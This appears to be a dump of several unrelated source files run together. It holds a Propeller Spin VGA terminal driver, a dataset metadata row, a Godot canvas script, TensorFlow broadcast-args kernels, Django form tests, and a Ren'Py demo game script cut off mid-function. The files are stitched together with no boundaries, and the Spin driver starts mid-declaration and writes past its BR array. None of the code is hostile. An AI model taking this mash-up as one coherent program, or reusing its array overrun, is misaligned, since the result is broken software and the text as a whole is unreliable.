word colors[rows] ' color specs for each screen row (see ColorPtr description above)
byte cursor[6] ' cursor info array (see CursorPtr description above)
long sync, loc, xloc, yloc ' sync used by VGA routine, others are local screen pointers
long kbdreq ' global val of kbdflag
long BR[8]
long Brate
byte inverse
byte invs
byte state ' Current state of state machine
word pos ' Current Position on the screen
word oldpos ' Previous location of cursor before update
word regionTop, regionBot ' Scroll region top/bottom
long arg0 ' First argument of escape sequence
long arg1 ' Second argument of escape sequence
byte lastc ' Last displayed char
word statpos
long vgabasepin
PUB start(BasePin) | i, char
vgabasepin := BasePin
''init screen colors to gold on blue
repeat i from 0 to rows - 1
colors[i] := $08F0 '$2804 (if you want cyan on blue)
''init cursor attributes
cursor[2] := %110 ' init cursor to underscore with slow blink
BR[0]:=300
BR[1]:=1200
BR[2]:=2400
BR[3]:=4800
BR[4]:=9600
BR[5]:=19200
BR[6]:=38400
BR[7]:=57600
BR[8]:=115200
xloc := cursor[0] := 0
yloc := cursor[1] := 0
loc := xloc + yloc*cols
pos := 0
regionTop := 0
regionBot := 35 * cols
state := 0
statpos := 37 * cols
PUB vidon
if (!vga.start(vgabasepin, @screen, @colors, @cursor, @sync))
return false
'waitcnt(clkfreq * 1 + cnt) 'wait 1 second for cogs to start
PUB vidoff
vga.stop
PUB inv(c)
inverse:=c
PUB color(colorVal) | i
repeat i from 0 to rows - 1
colors[i] := $0000 | colorVal
PUB cursorset(c) | i
i:=%000
if c == 1
i:= %001
if c == 2
i:= %010
if c == 3
i:= %011
if c == 4
i:= %101
if c == 5
i:= %110
if c == 6
i:= %111
if c == 7
i:= %000
cursor[2] := i
PUB bin(value, digits)
'' Print a binary number, specify number of digits
repeat while digits > 32
outc("0")
digits--
value <<= 32 - digits
repeat digits
outc((value <-= 1) & 1 + "0")
PUB clrbtm(ColorVal) | i
repeat i from 36 to rows - 1 'was 35
colors[i] := $0000 + ColorVal
PUB cls1(VerStr) | i
longfill(@screen[0], $20202020, chars / 4)
clrbtm(TURQUOISE)
inverse := 1
statprint(36, 0, VerStr)
inverse := 0
repeat i from 37 to (rows - 1)
statprint(i,0, string(" "))
{{
x :=xloc
y := yloc
invs := inverse
''clrbtm(TURQUOISE)
longfill(@screen, $20202020, chars/4)
xloc := 0
yloc :=0
loc := xloc + yloc*cols
repeat 80
outc(32)
xloc := 0
yloc :=36
loc := xloc + yloc*cols
inverse := 1
str(string(" "))
inverse := 0
str(string("Baud Rate: "))
i:= BR[6]
dec(i)
str(string(" "))
xloc := 18
loc := xloc + yloc*cols
str(string("Color "))
str(string("PC Port: "))
if pcport == 1
str(string("OFF "))
if pcport == 0
str(string("ON "))
str(string(" Force 7 bit: "))
if ascii == 0
str(string("NO "))
if ascii == 1
str(string("YES "))
str(string(" Cursor CR W/LF: "))
if CR == 1
str(string("YES"))
if CR == 0
str(string("NO "))
outc(13)
outc(10)
inverse:=1
xloc := 6
loc := xloc + yloc*cols
str(string("F1"))
xloc := 19
loc := xloc + yloc*cols
str(string("F2"))
xloc := 30
loc := xloc + yloc*cols
str(string("F3"))
xloc := 46
loc := xloc + yloc*cols
str(string("F4"))
xloc := 58
loc := xloc + yloc*cols
str(string("F5"))
xloc := 70
loc := xloc + yloc*cols
str(string("F6"))
inverse := invs
xloc := cursor[0] := x 'right & left was 0
yloc := cursor[1] := y 'from top was 1
loc := xloc + yloc*cols
}}
PUB clsupdate(c,screencolor,PCPORT,ascii,CR) | i,x,y,locold
invs := inverse
locold := loc
x := xloc
y := yloc
''(TURQUOISE)
xloc := 0
yloc :=36
loc := xloc + yloc*cols
inverse := 1
str(string(" "))
inverse := 0
xloc := 0
yloc :=37
loc := xloc + yloc*cols
str(string("Baud Rate: "))
i:= BR[6]
dec(i)
str(string(" "))
xloc := 18
loc := xloc + yloc*cols
str(string("Color "))
str(string("PC Port: "))
if pcport == 1
str(string("OFF "))
if pcport == 0
str(string("ON "))
str(string(" Force 7 bit: "))
if ascii == 0
str(string("NO "))
if ascii == 1
str(string("YES "))
str(string(" Cursor CR W/LF: "))
if CR == 1
str(string("YES"))
if CR == 0
str(string("NO "))
xloc := 0
yloc :=38
loc := xloc + yloc*cols
inverse:=1
xloc := 6
loc := xloc + yloc*cols
str(string("F1"))
xloc := 19
loc := xloc + yloc*cols
str(string("F2"))
xloc := 30
loc := xloc + yloc*cols
str(string("F3"))
xloc := 46
loc := xloc + yloc*cols
str(string("F4"))
xloc := 58
loc := xloc + yloc*cols
str(string("F5"))
xloc := 70
loc := xloc + yloc*cols
str(string("F6"))
inverse := invs
xloc := cursor[0] := x
yloc := cursor[1] := y
' loc := xloc + yloc*cols
loc := locold
PUB dec(value) | i
'' Print a decimal number
if value < 0
-value
outc("-")
i := 1_000_000_000
repeat 10
if value => i
outc(value/i + "0")
value //= i
result~~
elseif result or i == 1
outc("0")
i /= 10
PUB hex(value, digits)
'' Print a hexadecimal number, specify number of digits
repeat while digits > 8
outc("0")
digits--
value <<= (8 - digits) << 2
repeat digits
outc(lookupz((value <-= 4) & $f : "0".."9", "A".."F"))
PUB str(string_ptr)
'' Print a zero terminated string
repeat strsize(string_ptr)
process_char(byte[string_ptr++])
PUB statprint(r, c, str1) | x, ptr
ptr := r * cols + c
repeat x from 0 to STRSIZE(str1) - 1
putc(ptr++, BYTE[str1 + x])
PUB statnum(r, c, num1) | i, ptr
ptr := r * cols + c
if num1 < 0
-num1
putc(ptr++,"-")
i := 1_000_000_000
repeat 10
if num1 => i
putc(ptr++, (num1/i +"0"))
num1 //= i
result~~
elseif result or i == 1
putc(ptr++, "0")
i /= 10
PUB putc(position, c)
if inverse
c |= $80
screen[position] := c
PUB cls
longfill (@screen, $20202020, lastChar)
PUB fullcls
longfill(@screen, $20202020, 800)
PUB setInverse(val)
inverse := val
PUB setInv(c)
if c == 7
setInverse(1)
else
setInverse(0)
PUB clEOL(position) | count
count := cols - (position // cols)
bytefill(@screen + position, $20, count)
PUB clBOL(position) | count
count := position // cols
bytefill(@screen + position - count, $20, count)
PUB delLine(position) | src, count
position -= position // cols
src := position + cols
count := (maxChars - src) / 4
if count > 0
longmove(@screen + position, @screen + src, count)
longfill(@screen + lastLine, $20202020, lcols)
PUB clEOS(position)
cleol(position)
position += cols - (position // cols)
repeat while position < maxChars
longfill(@screen + position, $20202020, lcols)
pos += cols
PUB setCursorPos(position)
cursor[0] := position // cols
cursor[1] := position / cols
PUB insLine(position) | base, nxt
base := position - (position // cols)
position := lastLine
repeat while position > base
nxt := position - cols
longmove(@screen + position, @screen + nxt, lcols)
position := nxt
clEOL(base)
PUB insChar(position) | count
count := (cols - (position // cols)) - 1
bytemove(@tmpl, @screen + position, count)
screen[position] := " "
bytemove(@screen + position + 1, @tmpl, count)
PUB delChar(position) | count
count := (cols - (position // cols)) - 1
bytemove(@screen + position, @screen + position + 1, count)
screen[position + count] := " "
PRI inRegion : answer
answer := (pos => regionTop) AND (pos < regionBot)
PRI scrollUp
delLine(regionTop)
if regionBot < maxChars
insLine(regionBot)
PRI scrollDown
if regionBot < maxChars
delLine(regionBot)
insLine(regionTop)
PRI ansi(c) | x, defVal
state := 0
if (c <> "r") AND (c <> "J") AND (c <> "m") AND (c <> "K")
if arg0 == -1
arg0 := 1
if arg1 == -1
arg1 := 1
case c
"@":
repeat while arg0-- > 0
insChar(pos)
"b":
repeat while arg0-- > 0
outc(lastc)
"d":
if (arg0 < 1) OR (arg0 > rows)
arg0 := rows
pos := ((arg0 - 1) * cols) + (pos // cols)
"m":
setInv(arg0)
if arg1 <> -1
setInv(arg1)
"r":
if arg0 < 1
arg0 := 1
elseif arg0 > cols
arg0 := cols
if arg1 < 1
arg1 := 1
elseif arg1 > cols
arg1 := cols
if arg1 < arg0
arg1 := arg0
regionTop := (arg0 - 1) * cols
regionBot := arg1 * cols
pos := 0
"A":
repeat while arg0-- > 0
pos -= cols
if pos < 0
pos += cols
return
"B":
repeat while arg0-- > 0
pos += cols
if pos => maxChars
pos -= cols
return
"C":
repeat while arg0-- > 0
pos += 1
if pos => maxChars
pos -= 1
return
"D":
repeat while arg0-- > 0
pos -= 1
if pos < 0
pos := 0
return
"G":
if (arg0 < 1) OR (arg0 > cols)
arg0 := cols
pos := (pos - (pos // cols)) + (arg0 - 1)
"H", "f":
if arg0 =< 0
arg0 := 1
if arg1 =< 0
arg1 := 1
pos := (cols * (arg0 - 1)) + (arg1 - 1)
if pos < 0
pos := 0
if pos => maxChars
pos := maxChars - 1
"J":
if arg0 == 1
clBOL(pos)
x := pos - cols
x -= x // cols
repeat while x => 0
clEOL(x)
x -= cols
return
if arg0 == 2
pos := 0
clEOL(pos)
x := pos + cols
x -= (x // cols)
repeat while x < maxChars
clEOL(x)
x += cols
"K":
if arg0 == -1
clEOL(pos)
elseif arg0 == 1
clBOL(pos)
else
clEOL(pos - (pos // cols))
"L":
if inRegion
repeat while arg0-- > 0
if regionBot < maxChars
delLine(regionBot)
insLine(pos)
"M":
if inRegion
repeat while arg0-- > 0
delLine(pos)
if regionBot < maxChars
insLine(regionBot)
"P":
repeat while arg0--
delChar(pos)
PRI outc(c)
putc(pos++, lastc := c)
if pos == regionBot
scrollUp
pos -= cols
elseif pos == maxChars
pos := lastLine
PUB process_char(c)
case state
0:
if c > 127
c := $20
if c => $20
outc(c)
setCursorPos(pos)
return
if c == $1B
state := 1
return
if c == $0D
pos := pos - (pos // cols)
setCursorPos(pos)
return
if c == $0A
if inRegion
pos += cols
if pos => regionBot
scrollUp
pos -= cols
else
pos += cols
if pos => maxChars
pos -= cols
setCursorPos(pos)
return
if c == 9
pos += (8 - (pos // 8))
if pos => maxChars
pos := lastLine
delLine(0)
setCursorPos(pos)
return
if c == 8
if pos > 0
pos -= 1
setCursorPos(pos)
return
1:
case c
"[":
arg0 := arg1 := -1
state := 2
return
"P":
pos += cols
if pos => maxChars
pos -= cols
"K":
if pos > 0
pos -= 1
"H":
pos -= cols
if pos < 0
pos += cols
"D":
if inRegion
scrollUp
"M":
if inRegion
scrollDown
"G":
pos := 0
"(":
state := 5
return
state := 0
return
2:
if (c => "0") AND (c =< "9")
if arg0 == -1
arg0 := c - "0"
else
arg0 := (arg0 * 10) + (c - "0")
return
if c == ";"
state := 3
return
ansi(c)
setCursorPos(pos)
return
3:
if (c => "0") AND (c =< "9")
if arg1 == -1
arg1 := c - "0"
else
arg1 := (arg1 * 10) + (c - "0")
return
if c == ";"
state := 4
return
ansi(c)
setCursorPos(pos)
return
4:
if (c => "0") AND (c =< "9")
return
if c == ";"
return
ansi(c)
setCursorPos(pos)
return
5:
state := 0
return
return | Propeller Spin | 4 | davidknoll/RomWBW | Source/Prop/Spin/VGA_1024.spin | [
"DOC",
"MIT"
] |
extends Node2D
func _draw() -> void:
var current_cels : Array = Global.current_project.frames[Global.current_project.current_frame].cels
for i in range(Global.current_project.layers.size()):
if Global.current_project.layers[i].visible and current_cels[i].opacity > 0:
var modulate_color := Color(1, 1, 1, current_cels[i].opacity)
draw_texture(current_cels[i].image_texture, Vector2.ZERO, modulate_color)
| GDScript | 4 | triptych/Pixelorama | src/UI/Canvas/CurrentFrameDrawer.gd | [
"MIT"
] |
/* Copyright 2015 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#include "tensorflow/core/framework/op.h"
#include "tensorflow/core/framework/op_kernel.h"
#include "tensorflow/core/platform/macros.h"
#include "tensorflow/core/platform/types.h"
#include "tensorflow/core/util/bcast.h"
namespace tensorflow {
// Given shapes of two tensors, computes the broadcast shape.
template <typename T>
class BCastArgsOp : public OpKernel {
public:
explicit BCastArgsOp(OpKernelConstruction* ctx) : OpKernel(ctx) {}
void Compute(OpKernelContext* ctx) override {
OP_REQUIRES(
ctx, ctx->num_inputs() == 2,
errors::Unimplemented("Broadcast for n-ary operations (n > 2)"));
gtl::InlinedVector<BCast::Vec, 4> shapes;
for (int i = 0; i < ctx->num_inputs(); ++i) {
const Tensor& in = ctx->input(i);
OP_REQUIRES(ctx, TensorShapeUtils::IsVector(in.shape()),
errors::InvalidArgument("In[", i, "] must be a vector.",
in.shape().DebugString()));
BCast::Vec vec;
for (int64_t i = 0; i < in.NumElements(); ++i) {
vec.push_back(in.vec<T>()(i));
}
shapes.push_back(vec);
}
BCast bcast(shapes[0], shapes[1]);
OP_REQUIRES(ctx, bcast.IsValid(),
errors::InvalidArgument(
"Incompatible shapes: [", absl::StrJoin(shapes[0], ","),
"] vs. [", absl::StrJoin(shapes[1], ","), "]"));
Output(ctx, 0, bcast.output_shape());
}
bool IsExpensive() override { return false; }
private:
void Output(OpKernelContext* ctx, int idx, const BCast::Vec& v) {
const int64_t len = v.size();
Tensor* o = nullptr;
OP_REQUIRES_OK(ctx, ctx->allocate_output(idx, TensorShape({len}), &o));
for (int64_t i = 0; i < len; ++i) {
o->flat<T>()(i) = static_cast<T>(v[i]);
}
}
TF_DISALLOW_COPY_AND_ASSIGN(BCastArgsOp);
};
// Given shapes of two tensors, computes the reduction indices for the
// gradient computation.
//
// TODO(zhifengc):
// 1. Adds support for n-ary (n >= 2).
template <typename T>
class BCastGradArgsOp : public OpKernel {
public:
explicit BCastGradArgsOp(OpKernelConstruction* ctx) : OpKernel(ctx) {}
void Compute(OpKernelContext* ctx) override {
OP_REQUIRES(
ctx, ctx->num_inputs() == 2,
errors::Unimplemented("Broadcast for n-ary operations (n > 2)"));
gtl::InlinedVector<BCast::Vec, 4> shapes;
for (int i = 0; i < ctx->num_inputs(); ++i) {
const Tensor& in = ctx->input(i);
OP_REQUIRES(ctx, TensorShapeUtils::IsVector(in.shape()),
errors::InvalidArgument("In[", i, "] must be a vector.",
in.shape().DebugString()));
BCast::Vec vec;
for (int64_t i = 0; i < in.NumElements(); ++i) {
vec.push_back(in.vec<T>()(i));
}
shapes.push_back(vec);
}
BCast bcast(shapes[0], shapes[1]);
OP_REQUIRES(ctx, bcast.IsValid(),
errors::InvalidArgument(
"Incompatible shapes: [", absl::StrJoin(shapes[0], ","),
"] vs. [", absl::StrJoin(shapes[1], ","), "]"));
Output(ctx, 0, bcast.grad_x_reduce_idx());
Output(ctx, 1, bcast.grad_y_reduce_idx());
}
bool IsExpensive() override { return false; }
private:
void Output(OpKernelContext* ctx, int idx, const BCast::Vec& v) {
const int64_t len = v.size();
Tensor* o = nullptr;
OP_REQUIRES_OK(ctx, ctx->allocate_output(idx, TensorShape({len}), &o));
for (int64_t i = 0; i < len; ++i) {
o->flat<T>()(i) = static_cast<T>(v[i]);
}
}
TF_DISALLOW_COPY_AND_ASSIGN(BCastGradArgsOp);
};
REGISTER_KERNEL_BUILDER(Name("BroadcastArgs")
.Device(DEVICE_CPU)
.TypeConstraint<int32>("T")
.HostMemory("s0")
.HostMemory("s1")
.HostMemory("r0"),
BCastArgsOp<int32>);
REGISTER_KERNEL_BUILDER(Name("BroadcastArgs")
.Device(DEVICE_CPU)
.TypeConstraint<int64_t>("T")
.HostMemory("s0")
.HostMemory("s1")
.HostMemory("r0"),
BCastArgsOp<int64_t>);
REGISTER_KERNEL_BUILDER(Name("BroadcastArgs")
.Device(DEVICE_DEFAULT)
.TypeConstraint<int32>("T")
.HostMemory("s0")
.HostMemory("s1")
.HostMemory("r0"),
BCastArgsOp<int32>);
REGISTER_KERNEL_BUILDER(Name("BroadcastArgs")
.Device(DEVICE_DEFAULT)
.TypeConstraint<int64_t>("T")
.HostMemory("s0")
.HostMemory("s1")
.HostMemory("r0"),
BCastArgsOp<int64_t>);
REGISTER_KERNEL_BUILDER(Name("BroadcastGradientArgs")
.Device(DEVICE_CPU)
.TypeConstraint<int32>("T")
.HostMemory("s0")
.HostMemory("s1")
.HostMemory("r0")
.HostMemory("r1"),
BCastGradArgsOp<int32>);
REGISTER_KERNEL_BUILDER(Name("BroadcastGradientArgs")
.Device(DEVICE_CPU)
.TypeConstraint<int64_t>("T")
.HostMemory("s0")
.HostMemory("s1")
.HostMemory("r0")
.HostMemory("r1"),
BCastGradArgsOp<int64_t>);
REGISTER_KERNEL_BUILDER(Name("BroadcastGradientArgs")
.Device(DEVICE_DEFAULT)
.TypeConstraint<int32>("T")
.HostMemory("s0")
.HostMemory("s1")
.HostMemory("r0")
.HostMemory("r1"),
BCastGradArgsOp<int32>);
REGISTER_KERNEL_BUILDER(Name("BroadcastGradientArgs")
.Device(DEVICE_DEFAULT)
.TypeConstraint<int64_t>("T")
.HostMemory("s0")
.HostMemory("s1")
.HostMemory("r0")
.HostMemory("r1"),
BCastGradArgsOp<int64_t>);
} // end namespace tensorflow
| C++ | 5 | EricRemmerswaal/tensorflow | tensorflow/core/kernels/bcast_ops.cc | [
"Apache-2.0"
] |
from django.forms import ChoiceField, Field, Form, Select
from django.test import SimpleTestCase
class BasicFieldsTests(SimpleTestCase):
def test_field_sets_widget_is_required(self):
self.assertTrue(Field(required=True).widget.is_required)
self.assertFalse(Field(required=False).widget.is_required)
def test_cooperative_multiple_inheritance(self):
class A:
def __init__(self):
self.class_a_var = True
super().__init__()
class ComplexField(Field, A):
def __init__(self):
super().__init__()
f = ComplexField()
self.assertTrue(f.class_a_var)
def test_field_deepcopies_widget_instance(self):
class CustomChoiceField(ChoiceField):
widget = Select(attrs={'class': 'my-custom-class'})
class TestForm(Form):
field1 = CustomChoiceField(choices=[])
field2 = CustomChoiceField(choices=[])
f = TestForm()
f.fields['field1'].choices = [('1', '1')]
f.fields['field2'].choices = [('2', '2')]
self.assertEqual(f.fields['field1'].widget.choices, [('1', '1')])
self.assertEqual(f.fields['field2'].widget.choices, [('2', '2')])
class DisabledFieldTests(SimpleTestCase):
def test_disabled_field_has_changed_always_false(self):
disabled_field = Field(disabled=True)
self.assertFalse(disabled_field.has_changed('x', 'y'))
| Python | 3 | ni-ning/django | tests/forms_tests/field_tests/test_base.py | [
"CNRI-Python-GPL-Compatible",
"BSD-3-Clause"
] |
### Demo Script Example ###
# This script, but not the artwork associated with it, is in the
# public domain. Feel free to use it as the basis for your own
# game.
# If you're trying to understand this script, I recommend skipping
# down to the line beginning with 'label start:', at least on your
# first read-through.
# This init block runs first, and sets up all sorts of things that
# are used by the rest of the game. Variables that are set in init
# blocks are _not_ saved, unless they are changed later on in the
# program.
init:
# Set up the size of the screen, and the window title.
$ config.screen_width = 800
$ config.screen_height = 600
$ config.window_title = "The Ren'Py Demo Game"
# Declare the images that are used in the program.
# Backgrounds.
image bg carillon = "carillon.jpg"
image bg whitehouse = "whitehouse.jpg"
image bg washington = "washington.jpg"
image bg onememorial = "1memorial.jpg"
image black = Solid((0, 0, 0, 255))
# Character pictures.
image eileen happy = "9a_happy.png"
image eileen vhappy = "9a_vhappy.png"
image eileen concerned = "9a_concerned.png"
# A character object. This object lets us have the character say
# dialogue without us having to repeatedly type her name. It also
# lets us change the color of her name.
$ e = Character('Eileen', color=(200, 255, 200, 255))
# The start label marks the place where the main menu jumps to to
# begin the actual game.
label start:
# The save_name variable sets the name of the save game. Like all
# variables declared outside of init blocks, this variable is
# saved and restored with a save file.
$ save_name = "Introduction"
# This variable is only used by our game. If it's true, it means
# that we won the date.
$ date = False
# Clear the game runtime timer, so it doesn't reflect time spent
# sitting at the main menu.
$ renpy.clear_game_runtime()
# Start some music playing in the background.
$ renpy.music_start('sun-flower-slow-drag.mid')
# Now, set up the first scene. We first fade in our washington
# background, and then we dissolve in the image of Eileen on top
# of it.
scene bg washington with fade
show eileen vhappy with dissolve
# Store the current version of Ren'Py into a variable, so we can
# interpolate it into the next line.
$ version = renpy.version()
# Display a line of dialogue. In this case, we manually specify
# who's saying the line of dialogue. We also interpolate in the
# version of Ren'Py we're using.
"Girl" "Hi, and welcome to the %(version)s demo program."
# This instantly replaces the very happy picture of Eileen with
# one showing her merely happy. It demonstrates how the show
# statement lets characters change emotions.
show eileen happy
# Another line of dialogue.
"Girl" "My name is Eileen, and while I plan to one day star in a
real game, for now I'm here to tell you about Ren'Py."
# This line used the e character object, which displays Eileen's
# name in green. The use of a short name for a character object
# lets us save typing when writing the bulk of the dialogue.
e "Ren'Py is a language and engine for writing and playing visual
novel games."
e "Our goal is to allow people to be able to write the script for
a game, and with very little effort, turn that script into
a working game."
e "I can tell you about the features of Ren'Py games, or how to write
your own game. What do you want to know about?"
# This variable is used to save the choices that have been made in
# the main menu.
$ seen_set = [ ]
label choices:
# We change the save name here.
$ save_name = "Question Menu"
# This is the main menu, that lets the user decide what he wants
# to hear about.
menu:
# The set menu clause ensures that each menu choice can only
# be chosen once.
set seen_set
# This is a menu choice. When chosen, the statements in its
# block are executed.
"What are some user-visible features of Ren'Py games?":
# We call the features label. The from clause needs to be
# here to ensure that save games work, even after we
# change the script. It was added automatically.
call features from _call_features_1
# When we're done talking about features, jump back up
# to choices.
jump choices
# Another choice.
"How do I write my own games with it?":
call writing from _call_writing_1
jump choices
"Can you demonstrate more features to me?":
call demonstrate from _call_demonstrate_1
jump choices
# This choice has a condition associated with it. It is only
# displayed if the condition is true (in this case, if we have
# selected at least one other choice has been chosen.)
"Where can I find out more?" if seen_set:
call find_out_more from _call_find_out_more_1
jump choices
"Why are we in Washington, DC?":
call washington from _call_washington_1
jump choices
"I think I've heard enough." if seen_set:
jump ending
# This is the section on writing games.
label writing:
# Change the title of the save games.
$ save_name = "Writing Games"
# We start off with a bunch of dialogue.
e "If you want to write a game, we recommend that you read the
Ren'Py reference, which you can get from our web page,
http://www.bishoujo.us/renpy/."
e "But here, we'll go over some of the basics of writing Ren'Py
scripts. It might make sense if you open the source for this
game."
e "The source for this game can be found in the file
game/script.rpy."
e "The goal of Ren'Py is to make writing the game similar to
typing up the script on the computer."
e "For example, a line of dialogue is expressed by putting the
character's name next to the dialogue string."
# A string by itself like this displays without a name associated
# with it. So it's useful for dialogue and narration.
"I somehow remember that strings by themselves are displayed as
thoughts or narration."
e "The menu statement makes it easy to create menus."
e "A number of statements let you control what is shown on the
screen."
# This scene statement has a with clause associated with it. In
# this case (based on what is defined in the init clause at the
# top of this script), it causes a fade to black, and then back
# to the new scene.
scene bg whitehouse with fade
e "The scene statement clears the scene list, which is the list of
things that are shown on the screen."
# This shows an image, and dissolves it in.
show eileen happy with dissolve
e "The show statement shows another image on the screen."
# The at clause here, displays the character on the left side of
# the screen. The with clause causes us to slide from the old
# position to the new position.
show eileen happy at left with move
e "Images can take at clauses that specify where on the screen
they are shown."
show eileen vhappy at left
e "Showing a new image with the same first part of the name
replaces the image in the scene list."
hide eileen with dissolve
e "Finally, the hide statement hides an image, which is useful
when a character leaves the scene."
show eileen happy with dissolve
e "Don't worry, I'm not going anywhere."
e "The with statement is used to cause transitions to
happen. Transitions like fade..."
# This statement hides the transient stuff from being included
# in the next fade.
with None
# This with statement causes things to fade without changing the
# scene.
with fade
e "... or dissolve ..."
# In this block, the scene statement clears the scene list. So we
# have to reshow the eileen happy image, so that it appears that
# just the background is dissolving. Sneaky.
with None
scene bg washington
show eileen happy
with dissolve
e "... are easily invoked."
e "We now provide a series of user-interface functions, that allow
the programmer to create fairly complex interfaces."
e "Ren'Py also includes a number of control statements, and even
lets you include python code."
e "Rather than go into this here, you can read all about it in the
reference."
e "You can see a number of features in action by asking me to
demonstrate them at the next menu."
e "If you want to make changes, you can edit the script for this
game by editing game/script.rpy"
e "When you've made a change, just re-run the game to see your
change in action."
e "Would you like to know about something else?"
# We return back up to the menu that lets the user pick a topic.
return
# This ends the well-commented portion of this script.
label features:
$ save_name = "Features"
e "Ren'Py provides a number of gameplay features, giving the user
a good experience while freeing up the game author to write his
game."
e "What are some of these features? Well, first of all, we take
care of displaying the screen, as well as dialogue and menus."
e "You can navigate through the game using the keyboard or the
mouse. If you've gotten this far, you've probably figured that
out already."
e "Right-clicking or pressing escape will bring you to the game
menu."
e "The game menu lets you save or load the game. Ren'Py doesn't
limit the number of save slots available. You can create as
many slots as you can stand."
e "A preferences screen on the game menu lets you change the
fullscreen mode, control skipping, text speed, and
transitions, and turn sound and music on and off."
e "The game menu also lets you restart or quit the game. But you
wouldn't want to do that, would you?"
e "Finally, the game menu lets you set up the game
preferences. These preferences are saved between games."
show eileen vhappy
e "The next feature is really neat."
show eileen happy
menu rollback_menu:
"Would you like to hear about rollback?"
"Yes.":
pass
"No.":
jump after_rollback
e "Rollback is a feature that only Ren'Py has. It lets you go back
in time in a game."
e "For example, you can go back to a menu and save or make a
different choice."
e "You can access it by pressing page up or scrolling up on your
mouse wheel."
e "Why don't you try it by going back to the last menu and
choosing 'No.' instead of 'Yes.'"
e "Press page up or scroll up the mouse wheel."
show eileen concerned
e "Well, are you going to try it?"
e "Your loss."
e "Moving on."
label after_rollback:
show eileen happy
e "Ren'Py gives you a few ways of skipping dialogue. Pressing
control quickly skips dialogue you've seen at least once."
e "Pressing Tab toggles the skipping of dialogue you've seen at
least once."
e "Pressing page down or scrolling the mouse wheel down will let
you skip dialogue you've seen this session. This is useful
after a rollback."
e "If you want to try these, you might want to rollback a bit
first, so you can skip over something you've seen already."
e "Finally, Ren'Py has predictive image loading, so you rarely
have to wait for a new image to load."
e "Remember, all these features are built into the engine or
standard library. So every game written with Ren'Py has them."
e "Is there anything else you'd like to know about?"
return
label find_out_more:
$ save_name = "Find Out More"
e "There are a few places you can go to find out more about
Ren'Py."
e "The Ren'Py homepage, http://www.bishoujo.us/renpy/, is probably
the best place to start."
e "There, you can download new versions of Ren'Py, and read the
tutorial online."
e "If you have questions, the best place to ask them is the Ren'Py
forum of the Lemmasoft forums."
e "Just go to http://lemmasoft.renai.us/forums/, and click on
Ren'Py."
e "We thank Blue Lemma for hosting our forum."
e "Finally, feel free to email or IM us if you need help. You can
get the addresses to use from http://www.bishoujo.us/renpy/."
e "We really want people to make their own games with Ren'Py, and
if there's anything we can do to help, just tell us."
e "Is there anything I can help you with now?"
return
label washington:
$ save_name = "Washington, DC"
e "We're in Washington, DC because over Summer 2004 American
Bishoujo's home base was just outside of DC."
scene bg whitehouse
show eileen happy at left
with fade
e "Even though we've moved back to New York, we took a bunch of
pictures, and decided to use them."
show eileen concerned at left
e "It was easier than drawing new pictures for this demo."
show eileen happy at left
e "Do you have a favorite landmark in or around DC?"
menu:
"The White House.":
e "I was supposed to go on a tour of the West Wing, once."
show eileen concerned
e "They wouldn't let us in."
e "The secret service guy who was supposed to show us
around was out of town that day."
e "Too bad."
"The National Mall.":
e "It's always fun to go down to the national mall."
e "You can visit the monuments, or see one of the
museums."
e "I guess you could run out of things to do after a while
but I didn't over the course of a summer."
"The Netherlands Carillon.":
jump netherlands
jump post_netherlands
label netherlands:
show eileen vhappy at left
e "You've been to the Netherlands Carillon?"
scene bg carillon
show eileen vhappy at left
with dissolve
e "It may not be much to look at but the sound of the bells is
really neat."
e "I love going there. Saturdays during the summer, they have
these recitals in the park where a guy comes and plays the
bells live."
e "You can climb to the top and talk to him, if you're not afraid
of heights."
e "Once, I saw a little girl there, maybe three or four years old.
The guy played the bumblebee song for here, and he even let her play the last
note. It was so cute!"
e "I haven't been there for so long."
menu:
"Would you like to go there sometime?":
e "You mean, together?"
e "Sure, why not. How does next Saturday sound?"
e "It's a date."
$ date = True
"That sounds nice.":
show eileen happy at left
e "Well, it is."
label post_netherlands:
scene bg washington
show eileen happy
with fade
e "Anyway, is there anything else you want to know about Ren'Py?"
return
label ending:
$ save_name = "Ending"
e "Well, that's okay."
e "I hope you'll consider using Ren'Py for your next game
project."
show eileen vhappy
e "Thanks for viewing this demo!"
if date:
e "And I'll see you on Saturday."
scene black with dissolve
"Ren'Py and the Ren'Py demo were written by PyTom."
'The background music is "Sun Flower Slow Drag" by S. Joplin
(1868-1917). Thanks to the Mutopia project for making it
available.'
'The author would like to thank everyone who makes original
English-language bishoujo games, and the people on the Lemmasoft forums
who encouraged him.'
"We can't wait to see what you do with this. Good luck!"
$ minutes, seconds = divmod(int(renpy.get_game_runtime()), 60)
"It took you %(minutes)d minutes and %(seconds)d seconds to
finish this demo."
$ renpy.full_restart()
label speedtest:
with None
scene bg whitehouse
show eileen happy
with dissolve
e "Okay, I'm going to run the speedtest on your system."
e "I'll only be testing the performance of the dissolve
transition. It taxes your system the most, as it needs to
redraw the entire screen each frame."
$ frames = config.frames
with None
scene bg washington
show eileen happy
with Dissolve(5.0)
$ frames = config.frames - frames
$ fps = frames / 5.0
e "Well, your system displayed %(frames)d frames in five
seconds. That's %(fps).1f fps."
e "Remember, this is the worst-case speed, as usually we can just
draw the parts of the screen that have changed."
e "Thanks for viewing the secret speed test."
return
# Setup the secret key for the speedtest.
init:
python:
config.keymap['speedtest'] = [ 'S' ]
config.underlay.append(renpy.Keymap(speedtest=renpy.curried_call_in_new_context('speedtest')))
init:
# This is just some example code to show the ui functions in
# action. You probably want to delete this (and the call to
# day_planner above) from your game. This code isn't really all
# that useful except as an example.
python:
def day_planner():
periods = [ 'Morning', 'Afternoon', 'Evening' ]
choices = [ 'Study', 'Exercise',
'Eat', 'Drink', 'Be Merry' ]
plan = { 'Morning' : 'Eat',
'Afternoon' : 'Drink',
'Evening' : 'Be Merry' }
day = 'March 25th'
stats = [
('Strength', 100, 10),
('Intelligence', 100, 25),
('Moxie', 100, 100),
('Chutzpah', 100, 75),
]
editing = None
def button(text, selected, returns, **properties):
style = 'button'
style_text = 'button_text'
if selected:
style='selected_button'
style_text='selected_button_text'
ui.button(clicked=ui.returns(returns),
style=style, **properties)
ui.text(text, style=style_text)
while True:
# Stats Window
ui.window(xpos=0,
ypos=0,
xanchor='left',
yanchor='top',
xfill=True,
yminimum=200,
)
ui.vbox()
